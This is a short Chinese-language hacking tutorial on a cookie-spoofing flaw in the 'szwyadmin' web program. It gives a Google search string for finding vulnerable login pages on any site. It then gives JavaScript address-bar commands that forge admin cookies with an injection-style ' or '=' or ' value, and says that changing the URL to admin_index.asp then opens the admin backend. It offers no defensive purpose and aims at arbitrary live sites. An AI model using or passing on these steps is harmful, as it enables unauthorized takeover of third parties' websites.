szwyadmin程序cookies欺骗漏洞拿shell网站安全自

首先我们在Google中搜索关键词
关键字:inurl:szwyadmin/login. asp
任意打开一个搜索结果，打开登录界面后在地址栏中输入下面的代码：
代码：Javascript:alert(document.COOKIE="adminuser="+escape("&＃39;or&＃39;=&＃39;or&＃39;"));
Javascript:alert(document.COOKIE="adminpass="+escape("&＃39;or&＃39;=&＃39;or&＃39;"));
Javascript:alert(document.COOKIE="admindj="+escape("1"));
关闭此页面
 
 
在次打开登录界面
在地址栏中将login.asp改为admin_index.asp
就直接进入后台了
 
另外还可以试试
ewebeditor/admin_login.asp